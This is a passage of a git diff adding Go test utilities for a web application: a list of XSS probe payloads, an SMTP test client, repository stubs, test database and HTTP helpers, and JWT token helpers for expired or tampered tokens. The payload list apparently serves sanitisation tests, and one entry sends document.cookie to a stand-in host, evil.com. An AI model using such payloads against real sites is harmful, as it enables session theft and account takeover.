"<iframe src=javascript:alert('XSS')>",
|
||||
"<body onload=alert('XSS')>",
|
||||
"<input onfocus=alert('XSS') autofocus>",
|
||||
"<select onfocus=alert('XSS') autofocus>",
|
||||
"<textarea onfocus=alert('XSS') autofocus>",
|
||||
"'><script>alert('XSS')</script>",
|
||||
"\"><script>alert('XSS')</script>",
|
||||
"<script>document.location='http://evil.com/?cookie='+document.cookie</script>",
|
||||
"<img src=x onerror='eval(String.fromCharCode(97,108,101,114,116,40,49,41))'>",
|
||||
"<svg><script>alert('XSS')</script></svg>",
|
||||
"<iframe srcdoc='<script>alert(\"XSS\")</script>'>",
|
||||
"<link rel=stylesheet href=javascript:alert('XSS')>",
|
||||
"<meta http-equiv='refresh' content='0;url=javascript:alert(\"XSS\")'>",
|
||||
"<style>@import'javascript:alert(\"XSS\")';</style>",
|
||||
"<base href='javascript:alert(\"XSS\")//'>",
|
||||
"<form><button formaction='javascript:alert(\"XSS\")'>click",
|
||||
}
|
||||
104
internal/testutils/smtp_client.go
Normal file
104
internal/testutils/smtp_client.go
Normal file
@@ -0,0 +1,104 @@
|
||||
package testutils
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"time"
|
||||
)
|
||||
|
||||
type AsyncEmailSender interface {
|
||||
Send(to, subject, body string) error
|
||||
SendAsync(to, subject, body string) <-chan error
|
||||
SetTimeout(timeout time.Duration)
|
||||
}
|
||||
|
||||
type TestSMTPClient struct {
|
||||
sender AsyncEmailSender
|
||||
server *TestEmailServer
|
||||
}
|
||||
|
||||
func NewTestSMTPClient(factory func(port int) AsyncEmailSender) (*TestSMTPClient, error) {
|
||||
server, err := NewTestEmailServer()
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
time.Sleep(100 * time.Millisecond)
|
||||
|
||||
sender := factory(server.GetPort())
|
||||
if sender == nil {
|
||||
server.Close()
|
||||
return nil, fmt.Errorf("smtp sender factory returned nil")
|
||||
}
|
||||
|
||||
return &TestSMTPClient{
|
||||
sender: sender,
|
||||
server: server,
|
||||
}, nil
|
||||
}
|
||||
|
||||
func (c *TestSMTPClient) Sender() AsyncEmailSender {
|
||||
return c.sender
|
||||
}
|
||||
|
||||
func (c *TestSMTPClient) Server() *TestEmailServer {
|
||||
return c.server
|
||||
}
|
||||
|
||||
func (c *TestSMTPClient) Close() error {
|
||||
if c == nil || c.server == nil {
|
||||
return nil
|
||||
}
|
||||
|
||||
return c.server.Close()
|
||||
}
|
||||
|
||||
func (c *TestSMTPClient) SendTestEmail(to, subject, body string) error {
|
||||
if c == nil || c.sender == nil {
|
||||
return fmt.Errorf("smtp sender not configured")
|
||||
}
|
||||
|
||||
return c.sender.Send(to, subject, body)
|
||||
}
|
||||
|
||||
func (c *TestSMTPClient) SendTestEmailAsync(to, subject, body string) <-chan error {
|
||||
if c == nil || c.sender == nil {
|
||||
result := make(chan error, 1)
|
||||
result <- fmt.Errorf("smtp sender not configured")
|
||||
close(result)
|
||||
return result
|
||||
}
|
||||
|
||||
return c.sender.SendAsync(to, subject, body)
|
||||
}
|
||||
|
||||
func (c *TestSMTPClient) WaitForEmail(timeout time.Duration) bool {
|
||||
if c == nil || c.server == nil {
|
||||
return false
|
||||
}
|
||||
|
||||
return c.server.WaitForEmails(1, timeout)
|
||||
}
|
||||
|
||||
func (c *TestSMTPClient) GetReceivedEmails() []TestEmail {
|
||||
if c == nil || c.server == nil {
|
||||
return nil
|
||||
}
|
||||
|
||||
return c.server.GetEmails()
|
||||
}
|
||||
|
||||
func (c *TestSMTPClient) ClearReceivedEmails() {
|
||||
if c == nil || c.server == nil {
|
||||
return
|
||||
}
|
||||
|
||||
c.server.ClearEmails()
|
||||
}
|
||||
|
||||
func (c *TestSMTPClient) SetTimeout(timeout time.Duration) {
|
||||
if c == nil || c.sender == nil {
|
||||
return
|
||||
}
|
||||
|
||||
c.sender.SetTimeout(timeout)
|
||||
}
|
||||
325
internal/testutils/stubs.go
Normal file
325
internal/testutils/stubs.go
Normal file
@@ -0,0 +1,325 @@
|
||||
package testutils
|
||||
|
||||
import (
|
||||
"context"
|
||||
|
||||
"gorm.io/gorm"
|
||||
"goyco/internal/database"
|
||||
"goyco/internal/repositories"
|
||||
)
|
||||
|
||||
type PostRepositoryStub struct {
|
||||
CreateFn func(*database.Post) error
|
||||
GetByIDFn func(uint) (*database.Post, error)
|
||||
GetAllFn func(int, int) ([]database.Post, error)
|
||||
GetByUserIDFn func(uint, int, int) ([]database.Post, error)
|
||||
UpdateFn func(*database.Post) error
|
||||
DeleteFn func(uint) error
|
||||
CountFn func() (int64, error)
|
||||
CountByUserIDFn func(uint) (int64, error)
|
||||
GetTopPostsFn func(int) ([]database.Post, error)
|
||||
GetNewestPostsFn func(int) ([]database.Post, error)
|
||||
SearchFn func(string, int, int) ([]database.Post, error)
|
||||
GetPostsByDeletedUsersFn func() ([]database.Post, error)
|
||||
HardDeletePostsByDeletedUsersFn func() (int64, error)
|
||||
HardDeleteAllFn func() (int64, error)
|
||||
WithTxFn func(*gorm.DB) repositories.PostRepository
|
||||
}
|
||||
|
||||
func NewPostRepositoryStub() *PostRepositoryStub {
|
||||
return &PostRepositoryStub{}
|
||||
}
|
||||
|
||||
func (s *PostRepositoryStub) Create(post *database.Post) error {
|
||||
if s != nil && s.CreateFn != nil {
|
||||
return s.CreateFn(post)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (s *PostRepositoryStub) GetByID(id uint) (*database.Post, error) {
|
||||
if s != nil && s.GetByIDFn != nil {
|
||||
return s.GetByIDFn(id)
|
||||
}
|
||||
return nil, gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
func (s *PostRepositoryStub) GetAll(limit, offset int) ([]database.Post, error) {
|
||||
if s != nil && s.GetAllFn != nil {
|
||||
return s.GetAllFn(limit, offset)
|
||||
}
|
||||
return nil, nil
|
||||
}
|
||||
|
||||
func (s *PostRepositoryStub) GetByUserID(userID uint, limit, offset int) ([]database.Post, error) {
|
||||
if s != nil && s.GetByUserIDFn != nil {
|
||||
return s.GetByUserIDFn(userID, limit, offset)
|
||||
}
|
||||
return nil, nil
|
||||
}
|
||||
|
||||
func (s *PostRepositoryStub) Update(post *database.Post) error {
|
||||
if s != nil && s.UpdateFn != nil {
|
||||
return s.UpdateFn(post)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (s *PostRepositoryStub) Delete(id uint) error {
|
||||
if s != nil && s.DeleteFn != nil {
|
||||
return s.DeleteFn(id)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (s *PostRepositoryStub) Count() (int64, error) {
|
||||
if s != nil && s.CountFn != nil {
|
||||
return s.CountFn()
|
||||
}
|
||||
return 0, nil
|
||||
}
|
||||
|
||||
func (s *PostRepositoryStub) CountByUserID(userID uint) (int64, error) {
|
||||
if s != nil && s.CountByUserIDFn != nil {
|
||||
return s.CountByUserIDFn(userID)
|
||||
}
|
||||
return 0, nil
|
||||
}
|
||||
|
||||
func (s *PostRepositoryStub) GetTopPosts(limit int) ([]database.Post, error) {
|
||||
if s != nil && s.GetTopPostsFn != nil {
|
||||
return s.GetTopPostsFn(limit)
|
||||
}
|
||||
return s.GetAll(limit, 0)
|
||||
}
|
||||
|
||||
func (s *PostRepositoryStub) GetNewestPosts(limit int) ([]database.Post, error) {
|
||||
if s != nil && s.GetNewestPostsFn != nil {
|
||||
return s.GetNewestPostsFn(limit)
|
||||
}
|
||||
return s.GetAll(limit, 0)
|
||||
}
|
||||
|
||||
func (s *PostRepositoryStub) Search(query string, limit, offset int) ([]database.Post, error) {
|
||||
if s != nil && s.SearchFn != nil {
|
||||
return s.SearchFn(query, limit, offset)
|
||||
}
|
||||
return nil, nil
|
||||
}
|
||||
|
||||
func (s *PostRepositoryStub) GetPostsByDeletedUsers() ([]database.Post, error) {
|
||||
if s != nil && s.GetPostsByDeletedUsersFn != nil {
|
||||
return s.GetPostsByDeletedUsersFn()
|
||||
}
|
||||
return nil, nil
|
||||
}
|
||||
|
||||
func (s *PostRepositoryStub) HardDeletePostsByDeletedUsers() (int64, error) {
|
||||
if s != nil && s.HardDeletePostsByDeletedUsersFn != nil {
|
||||
return s.HardDeletePostsByDeletedUsersFn()
|
||||
}
|
||||
return 0, nil
|
||||
}
|
||||
|
||||
func (s *PostRepositoryStub) HardDeleteAll() (int64, error) {
|
||||
if s != nil && s.HardDeleteAllFn != nil {
|
||||
return s.HardDeleteAllFn()
|
||||
}
|
||||
return 0, nil
|
||||
}
|
||||
|
||||
func (s *PostRepositoryStub) WithTx(tx *gorm.DB) repositories.PostRepository {
|
||||
if s != nil && s.WithTxFn != nil {
|
||||
return s.WithTxFn(tx)
|
||||
}
|
||||
return s
|
||||
}
|
||||
|
||||
type UserRepositoryStub struct {
|
||||
CreateFn func(*database.User) error
|
||||
GetByIDFn func(uint) (*database.User, error)
|
||||
GetByIDIncludingDeletedFn func(uint) (*database.User, error)
|
||||
GetByUsernameFn func(string) (*database.User, error)
|
||||
GetByUsernameIncludingFn func(string) (*database.User, error)
|
||||
GetByEmailFn func(string) (*database.User, error)
|
||||
GetByVerificationFn func(string) (*database.User, error)
|
||||
GetByPasswordResetFn func(string) (*database.User, error)
|
||||
GetAllFn func(int, int) ([]database.User, error)
|
||||
UpdateFn func(*database.User) error
|
||||
DeleteFn func(uint) error
|
||||
HardDeleteFn func(uint) error
|
||||
SoftDeleteWithPostsFn func(uint) error
|
||||
LockFn func(uint) error
|
||||
UnlockFn func(uint) error
|
||||
GetPostsFn func(uint, int, int) ([]database.Post, error)
|
||||
GetDeletedUsersFn func() ([]database.User, error)
|
||||
HardDeleteAllFn func() (int64, error)
|
||||
CountFn func() (int64, error)
|
||||
WithTxFn func(*gorm.DB) repositories.UserRepository
|
||||
}
|
||||
|
||||
func NewUserRepositoryStub() *UserRepositoryStub {
|
||||
return &UserRepositoryStub{}
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) Create(user *database.User) error {
|
||||
if s != nil && s.CreateFn != nil {
|
||||
return s.CreateFn(user)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) GetByID(id uint) (*database.User, error) {
|
||||
if s != nil && s.GetByIDFn != nil {
|
||||
return s.GetByIDFn(id)
|
||||
}
|
||||
return nil, gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) GetByIDIncludingDeleted(id uint) (*database.User, error) {
|
||||
if s != nil && s.GetByIDIncludingDeletedFn != nil {
|
||||
return s.GetByIDIncludingDeletedFn(id)
|
||||
}
|
||||
return s.GetByID(id)
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) GetByUsername(username string) (*database.User, error) {
|
||||
if s != nil && s.GetByUsernameFn != nil {
|
||||
return s.GetByUsernameFn(username)
|
||||
}
|
||||
return nil, gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) GetByUsernameIncludingDeleted(username string) (*database.User, error) {
|
||||
if s != nil && s.GetByUsernameIncludingFn != nil {
|
||||
return s.GetByUsernameIncludingFn(username)
|
||||
}
|
||||
return s.GetByUsername(username)
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) GetByEmail(email string) (*database.User, error) {
|
||||
if s != nil && s.GetByEmailFn != nil {
|
||||
return s.GetByEmailFn(email)
|
||||
}
|
||||
return nil, gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) GetByVerificationToken(token string) (*database.User, error) {
|
||||
if s != nil && s.GetByVerificationFn != nil {
|
||||
return s.GetByVerificationFn(token)
|
||||
}
|
||||
return nil, gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) GetByPasswordResetToken(token string) (*database.User, error) {
|
||||
if s != nil && s.GetByPasswordResetFn != nil {
|
||||
return s.GetByPasswordResetFn(token)
|
||||
}
|
||||
return nil, gorm.ErrRecordNotFound
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) GetAll(limit, offset int) ([]database.User, error) {
|
||||
if s != nil && s.GetAllFn != nil {
|
||||
return s.GetAllFn(limit, offset)
|
||||
}
|
||||
return nil, nil
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) Update(user *database.User) error {
|
||||
if s != nil && s.UpdateFn != nil {
|
||||
return s.UpdateFn(user)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) Delete(id uint) error {
|
||||
if s != nil && s.DeleteFn != nil {
|
||||
return s.DeleteFn(id)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) HardDelete(id uint) error {
|
||||
if s != nil && s.HardDeleteFn != nil {
|
||||
return s.HardDeleteFn(id)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) SoftDeleteWithPosts(id uint) error {
|
||||
if s != nil && s.SoftDeleteWithPostsFn != nil {
|
||||
return s.SoftDeleteWithPostsFn(id)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) Lock(id uint) error {
|
||||
if s != nil && s.LockFn != nil {
|
||||
return s.LockFn(id)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) Unlock(id uint) error {
|
||||
if s != nil && s.UnlockFn != nil {
|
||||
return s.UnlockFn(id)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) GetPosts(userID uint, limit, offset int) ([]database.Post, error) {
|
||||
if s != nil && s.GetPostsFn != nil {
|
||||
return s.GetPostsFn(userID, limit, offset)
|
||||
}
|
||||
return nil, nil
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) GetDeletedUsers() ([]database.User, error) {
|
||||
if s != nil && s.GetDeletedUsersFn != nil {
|
||||
return s.GetDeletedUsersFn()
|
||||
}
|
||||
return nil, nil
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) HardDeleteAll() (int64, error) {
|
||||
if s != nil && s.HardDeleteAllFn != nil {
|
||||
return s.HardDeleteAllFn()
|
||||
}
|
||||
return 0, nil
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) Count() (int64, error) {
|
||||
if s != nil && s.CountFn != nil {
|
||||
return s.CountFn()
|
||||
}
|
||||
return 0, nil
|
||||
}
|
||||
|
||||
func (s *UserRepositoryStub) WithTx(tx *gorm.DB) repositories.UserRepository {
|
||||
if s != nil && s.WithTxFn != nil {
|
||||
return s.WithTxFn(tx)
|
||||
}
|
||||
return s
|
||||
}
|
||||
|
||||
type EmailSenderStub struct {
|
||||
SendFn func(to, subject, body string) error
|
||||
}
|
||||
|
||||
func (s *EmailSenderStub) Send(to, subject, body string) error {
|
||||
if s != nil && s.SendFn != nil {
|
||||
return s.SendFn(to, subject, body)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
type TitleFetcherStub struct {
|
||||
FetchTitleFn func(ctx context.Context, rawURL string) (string, error)
|
||||
}
|
||||
|
||||
func (s *TitleFetcherStub) FetchTitle(ctx context.Context, rawURL string) (string, error) {
|
||||
if s != nil && s.FetchTitleFn != nil {
|
||||
return s.FetchTitleFn(ctx, rawURL)
|
||||
}
|
||||
return "", nil
|
||||
}
|
||||
350
internal/testutils/testutils.go
Normal file
350
internal/testutils/testutils.go
Normal file
@@ -0,0 +1,350 @@
|
||||
package testutils
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"context"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"net/http"
|
||||
"net/http/httptest"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strconv"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"github.com/go-chi/chi/v5"
|
||||
"golang.org/x/crypto/bcrypt"
|
||||
"gorm.io/driver/sqlite"
|
||||
"gorm.io/gorm"
|
||||
"gorm.io/gorm/logger"
|
||||
"goyco/internal/config"
|
||||
"goyco/internal/database"
|
||||
"goyco/internal/middleware"
|
||||
"goyco/internal/repositories"
|
||||
)
|
||||
|
||||
var AppTestConfig = &config.Config{
|
||||
JWT: config.JWTConfig{
|
||||
Secret: "test-secret-key-for-testing-purposes-only",
|
||||
Expiration: 24,
|
||||
RefreshExpiration: 168,
|
||||
Issuer: "goyco",
|
||||
Audience: "goyco-users",
|
||||
},
|
||||
App: config.AppConfig{
|
||||
BaseURL: "http://localhost:8080",
|
||||
BcryptCost: 10,
|
||||
},
|
||||
RateLimit: config.RateLimitConfig{
|
||||
AuthLimit: 5,
|
||||
GeneralLimit: 100,
|
||||
HealthLimit: 60,
|
||||
MetricsLimit: 10,
|
||||
TrustProxyHeaders: false,
|
||||
},
|
||||
}
|
||||
|
||||
func NewTestConfig() *config.Config {
|
||||
return &config.Config{
|
||||
Database: config.DatabaseConfig{
|
||||
Host: "localhost",
|
||||
Port: "5432",
|
||||
User: "test",
|
||||
Password: "test",
|
||||
Name: "test_db",
|
||||
SSLMode: "disable",
|
||||
},
|
||||
Server: config.ServerConfig{
|
||||
Host: "localhost",
|
||||
Port: "8080",
|
||||
},
|
||||
JWT: config.JWTConfig{
|
||||
Secret: "test-jwt-secret-key-that-is-long-enough",
|
||||
Expiration: 24,
|
||||
RefreshExpiration: 168,
|
||||
Issuer: "goyco",
|
||||
Audience: "goyco-users",
|
||||
},
|
||||
SMTP: config.SMTPConfig{
|
||||
Host: "localhost",
|
||||
Port: 587,
|
||||
Username: "test",
|
||||
Password: "test",
|
||||
From: "test@example.com",
|
||||
},
|
||||
App: config.AppConfig{
|
||||
Debug: true,
|
||||
BaseURL: "http://localhost:8080",
|
||||
},
|
||||
RateLimit: config.RateLimitConfig{
|
||||
AuthLimit: 5,
|
||||
GeneralLimit: 100,
|
||||
HealthLimit: 60,
|
||||
MetricsLimit: 10,
|
||||
TrustProxyHeaders: false,
|
||||
},
|
||||
LogDir: "/tmp/goyco-test-logs",
|
||||
PIDDir: "/tmp/goyco-test-pids",
|
||||
}
|
||||
}
|
||||
|
||||
func sanitizeTestName(name string) string {
|
||||
|
||||
replacer := strings.NewReplacer(
|
||||
"/", "_",
|
||||
"#", "_",
|
||||
"\\", "_",
|
||||
"?", "_",
|
||||
"&", "_",
|
||||
"=", "_",
|
||||
" ", "_",
|
||||
)
|
||||
return replacer.Replace(name)
|
||||
}
|
||||
|
||||
func NewTestDB(t *testing.T) *gorm.DB {
|
||||
t.Helper()
|
||||
|
||||
sanitizedName := sanitizeTestName(t.Name())
|
||||
dbName := "file:memdb_" + sanitizedName + "?mode=memory&cache=shared&_journal_mode=WAL&_synchronous=NORMAL"
|
||||
db, err := gorm.Open(sqlite.Open(dbName), &gorm.Config{
|
||||
Logger: logger.Default.LogMode(logger.Silent),
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to connect to test database: %v", err)
|
||||
}
|
||||
err = db.AutoMigrate(
|
||||
&database.User{},
|
||||
&database.Post{},
|
||||
&database.Vote{},
|
||||
&database.AccountDeletionRequest{},
|
||||
&database.RefreshToken{},
|
||||
)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to migrate database: %v", err)
|
||||
}
|
||||
|
||||
if execErr := db.Exec("PRAGMA busy_timeout = 5000").Error; execErr != nil {
|
||||
t.Fatalf("Failed to configure busy timeout: %v", execErr)
|
||||
}
|
||||
if execErr := db.Exec("PRAGMA foreign_keys = ON").Error; execErr != nil {
|
||||
t.Fatalf("Failed to enable foreign keys: %v", execErr)
|
||||
}
|
||||
|
||||
sqlDB, err := db.DB()
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to access SQL DB: %v", err)
|
||||
}
|
||||
sqlDB.SetMaxOpenConns(1)
|
||||
sqlDB.SetMaxIdleConns(1)
|
||||
sqlDB.SetConnMaxLifetime(5 * time.Minute)
|
||||
return db
|
||||
}
|
||||
|
||||
type HTTPTestHelpers struct {
|
||||
t *testing.T
|
||||
}
|
||||
|
||||
func NewHTTPTestHelpers(t *testing.T) *HTTPTestHelpers {
|
||||
return &HTTPTestHelpers{t: t}
|
||||
}
|
||||
|
||||
func (h *HTTPTestHelpers) POST(url string, body any) *http.Request {
|
||||
jsonBody, err := json.Marshal(body)
|
||||
if err != nil {
|
||||
h.t.Fatalf("Failed to marshal request body: %v", err)
|
||||
}
|
||||
req := httptest.NewRequest("POST", url, bytes.NewBuffer(jsonBody))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
return req
|
||||
}
|
||||
|
||||
func (h *HTTPTestHelpers) GET(url string) *http.Request {
|
||||
return httptest.NewRequest("GET", url, nil)
|
||||
}
|
||||
|
||||
func (h *HTTPTestHelpers) PUT(url string, body any) *http.Request {
|
||||
jsonBody, err := json.Marshal(body)
|
||||
if err != nil {
|
||||
h.t.Fatalf("Failed to marshal request body: %v", err)
|
||||
}
|
||||
req := httptest.NewRequest("PUT", url, bytes.NewBuffer(jsonBody))
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
return req
|
||||
}
|
||||
|
||||
func (h *HTTPTestHelpers) DELETE(url string) *http.Request {
|
||||
return httptest.NewRequest("DELETE", url, nil)
|
||||
}
|
||||
|
||||
func WithURLParams(req *http.Request, params map[string]string) *http.Request {
|
||||
routeContext := chi.NewRouteContext()
|
||||
for key, value := range params {
|
||||
routeContext.URLParams.Add(key, value)
|
||||
}
|
||||
ctx := context.WithValue(req.Context(), chi.RouteCtxKey, routeContext)
|
||||
return req.WithContext(ctx)
|
||||
}
|
||||
|
||||
func WithUserContext(req *http.Request, key any, userID uint) *http.Request {
|
||||
ctx := context.WithValue(req.Context(), key, userID)
|
||||
return req.WithContext(ctx)
|
||||
}
|
||||
|
||||
func CreateTestUser(t *testing.T, db *gorm.DB) *database.User {
|
||||
t.Helper()
|
||||
user := &database.User{
|
||||
Username: "testuser",
|
||||
Email: "test@example.com",
|
||||
Password: "hashedpassword123",
|
||||
EmailVerified: true,
|
||||
}
|
||||
if err := db.Create(user).Error; err != nil {
|
||||
t.Fatalf("Failed to create test user: %v", err)
|
||||
}
|
||||
return user
|
||||
}
|
||||
|
||||
func CreateTestPost(t *testing.T, db *gorm.DB, authorID uint) *database.Post {
|
||||
t.Helper()
|
||||
post := &database.Post{
|
||||
Title: "Test Post",
|
||||
URL: "https://example.com/test",
|
||||
Content: "Test content",
|
||||
AuthorID: &authorID,
|
||||
}
|
||||
if err := db.Create(post).Error; err != nil {
|
||||
t.Fatalf("Failed to create test post: %v", err)
|
||||
}
|
||||
return post
|
||||
}
|
||||
|
||||
func CreateTestPIDFile(t *testing.T, pid int) string {
|
||||
dir := t.TempDir()
|
||||
pidFile := filepath.Join(dir, "goyco.pid")
|
||||
|
||||
err := os.WriteFile(pidFile, []byte(strconv.Itoa(pid)), 0644)
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to create test PID file: %v", err)
|
||||
}
|
||||
|
||||
return pidFile
|
||||
}
|
||||
|
||||
type HandlerTestHelper struct {
|
||||
t *testing.T
|
||||
}
|
||||
|
||||
func NewHandlerTestHelper(t *testing.T) *HandlerTestHelper {
|
||||
return &HandlerTestHelper{t: t}
|
||||
}
|
||||
|
||||
func (h *HandlerTestHelper) AssertResponseSuccess(t *testing.T, response map[string]any) {
|
||||
if success, ok := response["success"].(bool); !ok || !success {
|
||||
t.Fatalf("Expected success=true, got %v", response["success"])
|
||||
}
|
||||
}
|
||||
|
||||
func (h *HandlerTestHelper) AssertResponseError(t *testing.T, response map[string]any) {
|
||||
if success, ok := response["success"].(bool); !ok || success {
|
||||
t.Fatalf("Expected success=false, got %v", response["success"])
|
||||
}
|
||||
}
|
||||
|
||||
func (h *HandlerTestHelper) AssertStatusCode(t *testing.T, recorder *httptest.ResponseRecorder, expected int) {
|
||||
if recorder.Result().StatusCode != expected {
|
||||
t.Fatalf("Expected status %d, got %d", expected, recorder.Result().StatusCode)
|
||||
}
|
||||
}
|
||||
|
||||
func (h *HandlerTestHelper) CreateTestRequestWithUser(method, url string, body any, userID uint) *http.Request {
|
||||
var req *http.Request
|
||||
if body != nil {
|
||||
jsonBody, err := json.Marshal(body)
|
||||
if err != nil {
|
||||
h.t.Fatalf("Failed to marshal request body: %v", err)
|
||||
}
|
||||
req = httptest.NewRequest(method, url, bytes.NewBuffer(jsonBody))
|
||||
} else {
|
||||
req = httptest.NewRequest(method, url, nil)
|
||||
}
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
return WithUserContext(req, middleware.UserIDKey, userID)
|
||||
}
|
||||
|
||||
func (h *HandlerTestHelper) CreateTestRequest(method, url string, body any) *http.Request {
|
||||
var req *http.Request
|
||||
if body != nil {
|
||||
jsonBody, err := json.Marshal(body)
|
||||
if err != nil {
|
||||
h.t.Fatalf("Failed to marshal request body: %v", err)
|
||||
}
|
||||
req = httptest.NewRequest(method, url, bytes.NewBuffer(jsonBody))
|
||||
} else {
|
||||
req = httptest.NewRequest(method, url, nil)
|
||||
}
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
return req
|
||||
}
|
||||
|
||||
func (h *HandlerTestHelper) DecodeResponse(t *testing.T, recorder *httptest.ResponseRecorder) map[string]any {
|
||||
var response map[string]any
|
||||
if err := json.Unmarshal(recorder.Body.Bytes(), &response); err != nil {
|
||||
t.Fatalf("Failed to decode response: %v", err)
|
||||
}
|
||||
return response
|
||||
}
|
||||
|
||||
type ServiceSuite struct {
|
||||
DB *gorm.DB
|
||||
UserRepo repositories.UserRepository
|
||||
PostRepo repositories.PostRepository
|
||||
VoteRepo repositories.VoteRepository
|
||||
DeletionRepo repositories.AccountDeletionRepository
|
||||
RefreshTokenRepo *repositories.RefreshTokenRepository
|
||||
EmailSender *MockEmailSender
|
||||
TitleFetcher *MockTitleFetcher
|
||||
}
|
||||
|
||||
func NewServiceSuite(t *testing.T) *ServiceSuite {
|
||||
t.Helper()
|
||||
db := NewTestDB(t)
|
||||
|
||||
userRepo := repositories.NewUserRepository(db)
|
||||
postRepo := repositories.NewPostRepository(db)
|
||||
voteRepo := repositories.NewVoteRepository(db)
|
||||
deletionRepo := repositories.NewAccountDeletionRepository(db)
|
||||
refreshTokenRepo := repositories.NewRefreshTokenRepository(db)
|
||||
|
||||
emailSender := &MockEmailSender{}
|
||||
titleFetcher := &MockTitleFetcher{}
|
||||
|
||||
t.Cleanup(func() {
|
||||
sqlDB, _ := db.DB()
|
||||
sqlDB.Close()
|
||||
})
|
||||
|
||||
return &ServiceSuite{
|
||||
DB: db,
|
||||
UserRepo: userRepo,
|
||||
PostRepo: postRepo,
|
||||
VoteRepo: voteRepo,
|
||||
DeletionRepo: deletionRepo,
|
||||
RefreshTokenRepo: refreshTokenRepo,
|
||||
EmailSender: emailSender,
|
||||
TitleFetcher: titleFetcher,
|
||||
}
|
||||
}
|
||||
|
||||
func (s *ServiceSuite) Cleanup() {
|
||||
}
|
||||
|
||||
func HashPassword(password string) string {
|
||||
hashed, err := bcrypt.GenerateFromPassword([]byte(password), bcrypt.DefaultCost)
|
||||
if err != nil {
|
||||
panic(fmt.Sprintf("Failed to hash password: %v", err))
|
||||
}
|
||||
return string(hashed)
|
||||
}
|
||||
83
internal/testutils/token_helpers.go
Normal file
83
internal/testutils/token_helpers.go
Normal file
@@ -0,0 +1,83 @@
|
||||
package testutils
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"github.com/golang-jwt/jwt/v5"
|
||||
"goyco/internal/config"
|
||||
"goyco/internal/database"
|
||||
)
|
||||
|
||||
const (
|
||||
TokenTypeAccess = "access"
|
||||
TokenTypeRefresh = "refresh"
|
||||
)
|
||||
|
||||
type TokenClaims struct {
|
||||
UserID uint `json:"sub"`
|
||||
Username string `json:"username"`
|
||||
SessionVersion uint `json:"session_version"`
|
||||
TokenType string `json:"type"`
|
||||
KeyID string `json:"kid,omitempty"`
|
||||
jwt.RegisteredClaims
|
||||
}
|
||||
|
||||
type TokenOption func(*TokenClaims, *config.JWTConfig) string
|
||||
|
||||
func GenerateTestToken(t *testing.T, user *database.User, cfg *config.JWTConfig, opts ...TokenOption) string {
|
||||
t.Helper()
|
||||
|
||||
claims := TokenClaims{
|
||||
UserID: user.ID,
|
||||
Username: user.Username,
|
||||
SessionVersion: user.SessionVersion,
|
||||
TokenType: TokenTypeAccess,
|
||||
RegisteredClaims: jwt.RegisteredClaims{
|
||||
Issuer: cfg.Issuer,
|
||||
Audience: []string{cfg.Audience},
|
||||
Subject: fmt.Sprint(user.ID),
|
||||
IssuedAt: jwt.NewNumericDate(time.Now()),
|
||||
ExpiresAt: jwt.NewNumericDate(time.Now().Add(24 * time.Hour)),
|
||||
},
|
||||
}
|
||||
|
||||
secret := cfg.Secret
|
||||
for _, opt := range opts {
|
||||
if opt != nil {
|
||||
secret = opt(&claims, cfg)
|
||||
if secret == "" {
|
||||
secret = cfg.Secret
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
|
||||
tokenString, err := token.SignedString([]byte(secret))
|
||||
if err != nil {
|
||||
t.Fatalf("failed to create token: %v", err)
|
||||
}
|
||||
|
||||
return tokenString
|
||||
}
|
||||
|
||||
func WithExpiredToken(claims *TokenClaims, cfg *config.JWTConfig) string {
|
||||
claims.IssuedAt = jwt.NewNumericDate(time.Now().Add(-2 * time.Hour))
|
||||
claims.ExpiresAt = jwt.NewNumericDate(time.Now().Add(-1 * time.Hour))
|
||||
return cfg.Secret
|
||||
}
|
||||
|
||||
func WithTamperedSecret(claims *TokenClaims, cfg *config.JWTConfig) string {
|
||||
return cfg.Secret + "-tampered"
|
||||
}
|
||||
|
||||
func WithWrongIssuer(claims *TokenClaims, cfg *config.JWTConfig) string {
|
||||
